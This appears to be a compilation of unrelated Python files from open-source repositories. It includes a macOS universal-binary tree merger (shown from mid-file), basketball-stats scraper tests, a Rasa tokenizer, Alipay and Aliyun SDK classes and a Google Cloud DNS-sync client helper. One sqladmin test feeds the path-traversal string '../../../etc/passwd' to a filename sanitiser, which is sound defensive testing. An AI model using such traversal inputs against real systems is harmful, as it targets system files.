shutil.copyfile(input_paths[0], output_path)
elif type == 'directory':
os.mkdir(output_path)
entries = set()
for input in input_paths:
entries.update(os.listdir(input))
for entry in entries:
input_entry_paths = [os.path.join(x, entry) for x in input_paths]
output_entry_path = os.path.join(output_path, entry)
_universalize(input_entry_paths, output_entry_path, False)
elif type == 'symbolic_link':
targets = [os.readlink(x) for x in input_paths]
target = _sole_list_element(
targets, 'varying symbolic link targets %r for input paths %r' %
(targets, input_paths))
os.symlink(target, output_path)
input_permissions = [stat.S_IMODE(x.st_mode) for x in input_stats]
permission = _sole_list_element(
input_permissions, 'varying permissions %r for input paths %r' %
(['0o%o' % x for x in input_permissions], input_paths))
os.lchmod(output_path, permission)
if type != 'file' or identical:
input_mtimes = [x.st_mtime for x in input_stats]
if len(set(input_mtimes)) == 1:
times = (time.time(), input_mtimes[0])
try:
# follow_symlinks is only available since Python 3.3.
os.utime(output_path, times, follow_symlinks=False)
except TypeError:
# If it’s a symbolic link and this version of Python isn’t able
# to set its timestamp, just leave it alone.
if type != 'symbolic_link':
os.utime(output_path, times)
elif type == 'directory':
# Always touch directories, in case a directory is a bundle, as a
# cue to LaunchServices to invalidate anything it may have cached
# about the bundle as it was being built.
os.utime(output_path, None)
def universalize(input_paths, output_path):
"""Merges multiple trees into a “universal” tree.
Args:
input_paths: The input directory trees to be merged.
output_path: The merged tree to produce.
input_paths are expected to be parallel directory trees. Each directory
entry at a given subpath in the input_paths, if present, must be identical
to all others when present, with these exceptions:
- Mach-O files that are not identical are merged using lipo.
- Info.plist files that are not identical are merged by _merge_info_plists.
"""
rmtree_on_error = not os.path.exists(output_path)
try:
return _universalize(input_paths, output_path, True)
except:
if rmtree_on_error and os.path.exists(output_path):
shutil.rmtree(output_path)
raise
def main(args):
parser = argparse.ArgumentParser(
description='Merge multiple single-architecture directory trees into a '
'single universal tree.')
parser.add_argument(
'inputs',
nargs='+',
metavar='input',
help='An input directory tree to be merged. At least two inputs must '
'be provided.')
parser.add_argument('output', help='The merged directory tree to produce.')
parsed = parser.parse_args(args)
if len(parsed.inputs) < 2:
raise Exception('too few inputs')
universalize(parsed.inputs, parsed.output)
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
test/test_teams.py | Galtozzy/basketball_reference_scraper | 191 | 12771233 | <filename>test/test_teams.py
import unittest
from basketball_reference_scraper.teams import get_roster, get_team_stats, get_opp_stats, get_roster_stats, get_team_misc
class TestTeams(unittest.TestCase):
def test_get_roster(self):
df = get_roster('GSW', 2019)
curry_df = df[df['PLAYER']=='<NAME>']
self.assertEqual(len(curry_df), 1)
expected_columns = ['NUMBER', 'PLAYER', 'POS', 'HEIGHT', 'WEIGHT',
'BIRTH_DATE', 'NATIONALITY', 'EXPERIENCE', 'COLLEGE']
self.assertListEqual(list(df.columns), expected_columns)
def test_get_roster_on_missing_nationality(self):
df = get_roster('FTW', 1956)
expected_columns = ['NUMBER', 'PLAYER', 'POS', 'HEIGHT', 'WEIGHT',
'BIRTH_DATE', 'NATIONALITY', 'EXPERIENCE', 'COLLEGE']
self.assertListEqual(list(df.columns), expected_columns)
def get_team_stats(self):
series = get_team_stats('GSW', 2019)
expected_indices = ['G', 'MP', 'FG', 'FGA', 'FG%', '3P', '3PA', '3P%', '2P', '2PA', '2P%', 'FT', 'FTA', 'FT%', 'ORB', 'DRB', 'TRB', 'AST', 'STL', 'BLK', 'TOV', 'PF', 'PTS']
self.assertCountEqual(list(series.index), expected_indices)
def get_opp_stats(self):
series = get_opp_stats('GSW', 2019)
expected_indices = ['OPP_G', 'OPP_MP', 'OPP_FG', 'OPP_FGA', 'OPP_FG%', 'OPP_3P', 'OPP_3PA', 'OPP_3P%', 'OPP_2P', 'OPP_2PA', 'OPP_2P%', 'OPP_FT', 'OPP_FTA', 'OPP_FT%', 'OPP_ORB', 'OPP_DRB', 'OPP_TRB', 'OPP_AST', 'OPP_STL', 'OPP_BLK', 'OPP_TOV', 'OPP_PF', 'OPP_PTS']
self.assertCountEqual(list(series.index), expected_indices)
def test_get_roster_stats(self):
df = get_roster_stats('GSW', 2019)
expected_columns = ['PLAYER', 'POS', 'AGE', 'TEAM', 'G', 'GS', 'MP', 'FG', 'FGA', 'FG%', '3P', '3PA', '3P%', '2P', '2PA', '2P%', 'eFG%', 'FT', 'FTA', 'FT%', 'ORB', 'DRB', 'TRB', 'AST', 'STL', 'BLK', 'TOV', 'PF', 'PTS', 'SEASON']
self.assertCountEqual(list(df.columns), expected_columns)
def test_get_team_misc(self):
series = get_team_misc('GSW', 2019)
expected_indices = ['AGE', 'W', 'L', 'PW', 'PL', 'MOV', 'SOS', 'SRS', 'ORtg', 'DRtg', 'NRtg', 'PACE', 'FTr', '3PAr', 'TS%', 'eFG%', 'TOV%', 'ORB%', 'FT/FGA', 'eFG%', 'TOV%', 'DRB%', 'FT/FGA', 'ARENA', 'ATTENDANCE', 'ATTENDANCE/G', 'TEAM', 'SEASON']
self.assertCountEqual(list(series.index), expected_indices)
series = get_team_misc('CHO', 2019)
self.assertCountEqual(list(series.index), expected_indices)
series = get_team_misc('NOK', 2007)
self.assertCountEqual(list(series.index), expected_indices)
series = get_team_misc('TCB', 1951)
self.assertCountEqual(list(series.index), expected_indices)
if __name__ == '__main__':
unittest.main()
|
tests/test_helpers.py | baurt/sqladmin | 319 | 12771274 | from sqladmin.helpers import secure_filename
def test_secure_filename(monkeypatch):
assert secure_filename("My cool movie.mov") == "My_cool_movie.mov"
assert secure_filename("../../../etc/passwd") == "etc_passwd"
assert (
secure_filename("i contain cool \xfcml\xe4uts.txt")
== "i_contain_cool_umlauts.txt"
)
assert secure_filename("__filename__") == "filename"
assert secure_filename("foo$&^*)bar") == "foobar"
|
rasa_nlu/tokenizers/yaha_tokenizer.py | hetaomilk123/Rasa_NLU_Chi | 1,304 | 12771279 | # -*- coding: utf-8 -*-
"""
Created on Thu Nov 23 14:54:35 2017
@author: user
"""
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from typing import Any
from typing import Dict
from typing import List
from typing import Text
from rasa_nlu.config import RasaNLUConfig
from rasa_nlu.tokenizers import Tokenizer, Token
from rasa_nlu.components import Component
from rasa_nlu.training_data import Message
from rasa_nlu.training_data import TrainingData
import sys
from yaha import Cuttor
reload(sys)
sys.setdefaultencoding('utf-8')
class YahaTokenizer(Tokenizer, Component):
name = "tokenizer_yaha"
provides = ["tokens"]
cuttor = Cuttor()
def __init__(self):
pass
@classmethod
def required_packages(cls):
# type: () -> List[Text]
return ["yaha"]
def train(self, training_data, config, **kwargs):
# type: (TrainingData, RasaNLUConfig, **Any) -> None
if config['language'] != 'zh':
raise Exception("tokenizer_yaha is only used for Chinese. Check your configure json file.")
for example in training_data.training_examples:
example.set("tokens", self.tokenize(example.text))
def process(self, message, **kwargs):
# type: (Message, **Any) -> None
message.set("tokens", self.tokenize(message.text))
def tokenize(self, text):
# type: (Text) -> List[Token]
tokenized = self.cuttor.tokenize(text.decode('utf-8'), search=True)
tokens = [Token(word, start) for (word, start, end) in tokenized]
return tokens
|
alipay/aop/api/response/AlipayOpenServicemarketCommodityQueryResponse.py | snowxmas/alipay-sdk-python-all | 213 | 12771297 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipayOpenServicemarketCommodityQueryResponse(AlipayResponse):
def __init__(self):
super(AlipayOpenServicemarketCommodityQueryResponse, self).__init__()
self._app_hot_logo = None
self._audit_memo = None
self._authorization_file = None
self._biz_type_code = None
self._category_code = None
self._category_id = None
self._commodity_affiliation = None
self._commodity_id = None
self._contactor = None
self._create_date = None
self._log_url = None
self._mobile_visiturl = None
self._name = None
self._phone = None
self._status = None
self._sub_status = None
self._subtitle = None
self._test_detail = None
self._test_report = None
self._title = None
self._user_guide = None
self._user_id = None
@property
def app_hot_logo(self):
return self._app_hot_logo
@app_hot_logo.setter
def app_hot_logo(self, value):
self._app_hot_logo = value
@property
def audit_memo(self):
return self._audit_memo
@audit_memo.setter
def audit_memo(self, value):
self._audit_memo = value
@property
def authorization_file(self):
return self._authorization_file
@authorization_file.setter
def authorization_file(self, value):
self._authorization_file = value
@property
def biz_type_code(self):
return self._biz_type_code
@biz_type_code.setter
def biz_type_code(self, value):
self._biz_type_code = value
@property
def category_code(self):
return self._category_code
@category_code.setter
def category_code(self, value):
self._category_code = value
@property
def category_id(self):
return self._category_id
@category_id.setter
def category_id(self, value):
self._category_id = value
@property
def commodity_affiliation(self):
return self._commodity_affiliation
@commodity_affiliation.setter
def commodity_affiliation(self, value):
self._commodity_affiliation = value
@property
def commodity_id(self):
return self._commodity_id
@commodity_id.setter
def commodity_id(self, value):
self._commodity_id = value
@property
def contactor(self):
return self._contactor
@contactor.setter
def contactor(self, value):
self._contactor = value
@property
def create_date(self):
return self._create_date
@create_date.setter
def create_date(self, value):
self._create_date = value
@property
def log_url(self):
return self._log_url
@log_url.setter
def log_url(self, value):
self._log_url = value
@property
def mobile_visiturl(self):
return self._mobile_visiturl
@mobile_visiturl.setter
def mobile_visiturl(self, value):
self._mobile_visiturl = value
@property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
@property
def phone(self):
return self._phone
@phone.setter
def phone(self, value):
self._phone = value
@property
def status(self):
return self._status
@status.setter
def status(self, value):
self._status = value
@property
def sub_status(self):
return self._sub_status
@sub_status.setter
def sub_status(self, value):
self._sub_status = value
@property
def subtitle(self):
return self._subtitle
@subtitle.setter
def subtitle(self, value):
self._subtitle = value
@property
def test_detail(self):
return self._test_detail
@test_detail.setter
def test_detail(self, value):
self._test_detail = value
@property
def test_report(self):
return self._test_report
@test_report.setter
def test_report(self, value):
self._test_report = value
@property
def title(self):
return self._title
@title.setter
def title(self, value):
self._title = value
@property
def user_guide(self):
return self._user_guide
@user_guide.setter
def user_guide(self, value):
self._user_guide = value
@property
def user_id(self):
return self._user_id
@user_id.setter
def user_id(self, value):
self._user_id = value
def parse_response_content(self, response_content):
response = super(AlipayOpenServicemarketCommodityQueryResponse, self).parse_response_content(response_content)
if 'app_hot_logo' in response:
self.app_hot_logo = response['app_hot_logo']
if 'audit_memo' in response:
self.audit_memo = response['audit_memo']
if 'authorization_file' in response:
self.authorization_file = response['authorization_file']
if 'biz_type_code' in response:
self.biz_type_code = response['biz_type_code']
if 'category_code' in response:
self.category_code = response['category_code']
if 'category_id' in response:
self.category_id = response['category_id']
if 'commodity_affiliation' in response:
self.commodity_affiliation = response['commodity_affiliation']
if 'commodity_id' in response:
self.commodity_id = response['commodity_id']
if 'contactor' in response:
self.contactor = response['contactor']
if 'create_date' in response:
self.create_date = response['create_date']
if 'log_url' in response:
self.log_url = response['log_url']
if 'mobile_visiturl' in response:
self.mobile_visiturl = response['mobile_visiturl']
if 'name' in response:
self.name = response['name']
if 'phone' in response:
self.phone = response['phone']
if 'status' in response:
self.status = response['status']
if 'sub_status' in response:
self.sub_status = response['sub_status']
if 'subtitle' in response:
self.subtitle = response['subtitle']
if 'test_detail' in response:
self.test_detail = response['test_detail']
if 'test_report' in response:
self.test_report = response['test_report']
if 'title' in response:
self.title = response['title']
if 'user_guide' in response:
self.user_guide = response['user_guide']
if 'user_id' in response:
self.user_id = response['user_id']
|
aliyun-python-sdk-videoenhan/aliyunsdkvideoenhan/request/v20200320/ChangeVideoSizeRequest.py | yndu13/aliyun-openapi-python-sdk | 1,001 | 12771354 | <filename>aliyun-python-sdk-videoenhan/aliyunsdkvideoenhan/request/v20200320/ChangeVideoSizeRequest.py<gh_stars>1000+
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkvideoenhan.endpoint import endpoint_data
class ChangeVideoSizeRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'videoenhan', '2020-03-20', 'ChangeVideoSize','videoenhan')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_Height(self):
return self.get_body_params().get('Height')
def set_Height(self,Height):
self.add_body_params('Height', Height)
def get_B(self):
return self.get_body_params().get('B')
def set_B(self,B):
self.add_body_params('B', B)
def get_FillType(self):
return self.get_body_params().get('FillType')
def set_FillType(self,FillType):
self.add_body_params('FillType', FillType)
def get_G(self):
return self.get_body_params().get('G')
def set_G(self,G):
self.add_body_params('G', G)
def get_CropType(self):
return self.get_body_params().get('CropType')
def set_CropType(self,CropType):
self.add_body_params('CropType', CropType)
def get_R(self):
return self.get_body_params().get('R')
def set_R(self,R):
self.add_body_params('R', R)
def get_VideoUrl(self):
return self.get_body_params().get('VideoUrl')
def set_VideoUrl(self,VideoUrl):
self.add_body_params('VideoUrl', VideoUrl)
def get_Width(self):
return self.get_body_params().get('Width')
def set_Width(self,Width):
self.add_body_params('Width', Width)
def get_Tightness(self):
return self.get_body_params().get('Tightness')
def set_Tightness(self,Tightness):
self.add_body_params('Tightness', Tightness) |
tests/r/test_bio_chemists.py | hajime9652/observations | 199 | 12771355 | <reponame>hajime9652/observations<gh_stars>100-1000
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.bio_chemists import bio_chemists
def test_bio_chemists():
"""Test module bio_chemists.py by downloading
bio_chemists.csv and testing shape of
extracted data has 915 rows and 6 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = bio_chemists(test_path)
try:
assert x_train.shape == (915, 6)
except:
shutil.rmtree(test_path)
raise()
|
addons/mendeley/views.py | gaybro8777/osf.io | 628 | 12771370 | # -*- coding: utf-8 -*-
from .provider import MendeleyCitationsProvider
from website.citations.views import GenericCitationViews
mendeley_views = GenericCitationViews('mendeley', MendeleyCitationsProvider)
|
tools/dns-sync/dns_sync/api.py | ruchirjain86/professional-services | 2,116 | 12771375 | # Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import threading
from google.cloud import datastore
from google.cloud import resource_manager
from googleapiclient import discovery
from googleapiclient import errors
import httplib2
from oauth2client import client
import webapp2
def resource_iterator(next_page_function):
"""Loop through resources from a Google API.
An iterator that returns all of the resources from a Google API 'list'
operation paging through each set.
Args:
next_page_function: A function that when called will return the next
page of results.
Yields:
A list if resources, which are typically dictionaries.
"""
next_page_token = None
more_results = True
while more_results:
resource_response = None
try:
resource_response = next_page_function(next_page_token).execute()
except errors.HttpError:
# Some projects throw a 403. (compute engine isn't enabled)
# just ignore those resources.
logging.debug('skipping resources.', exc_info=True)
return
for items_field in ['items', 'rrsets', 'managedZones']:
items = resource_response.get(items_field, {})
if items and (type(items) == dict):
for item in items.iteritems():
yield item
if items and (type(items) == list):
for item in items:
yield item
if 'nextPageToken' in resource_response:
next_page_token = resource_response['nextPageToken']
else:
more_results = False
class ThreadsafeClientLocal(object):
"""A thread local Google API client descriptor.
Httplib2 is not threadsafe so each request thread requires it's own
threadlocal client object which this creates.
Attributes:
service: String name of the API to create the client for.
version: String version of the API client.
"""
_class_thread_local = threading.local()
def __init__(self, service, version):
"""Create a thread local API client.
Will create the underlying httplib2.Http object on construction, but
the underlying API client is lazy constructed.
Args:
service: Name of API.
version: Version of the api.
"""
self.service = service
self.version = version
self.http = httplib2.Http(timeout=60)
self.cache_discovery = True
def __get__(self, instance, instance_type):
"""Construct the API client."""
if instance is None:
return self
thread_local = None
try:
app = webapp2.get_app()
# Python Google API clients aren't threadsafe as they use httplib2
# which isn't threadsafe.
thread_local = app.registry.get(self)
if thread_local is None:
thread_local = threading.local()
app.registry[self] = thread_local
except AssertionError:
# When not in a request context, use class thread local.
thread_local = ThreadsafeClientLocal._class_thread_local
cached_client = getattr(thread_local, 'api', None)
if cached_client is None:
credentials = client.GoogleCredentials.get_application_default()
if credentials.create_scoped_required():
credentials = credentials.create_scoped(
'https://www.googleapis.com/auth/cloud-platform')
cached_client = discovery.build(
self.service,
self.version,
http=credentials.authorize(self.http),
cache_discovery=self.cache_discovery)
thread_local.api = cached_client
return cached_client
class Clients(object):
"""Holds API clients.
For Google API clients, we use thread local descriptors which creates the
client on first access. The "google.cloud" clients are threadsafe and are
simple properties.
"""
metrics = ThreadsafeClientLocal('monitoring', 'v3')
compute = ThreadsafeClientLocal('compute', 'v1')
dns = ThreadsafeClientLocal('dns', 'v1')
iam = ThreadsafeClientLocal('cloudresourcemanager', 'v1')
def __init__(self):
self.datastore = datastore.Client()
self.crm = resource_manager.Client()
CLIENTS = Clients()
|
Subsets and Splits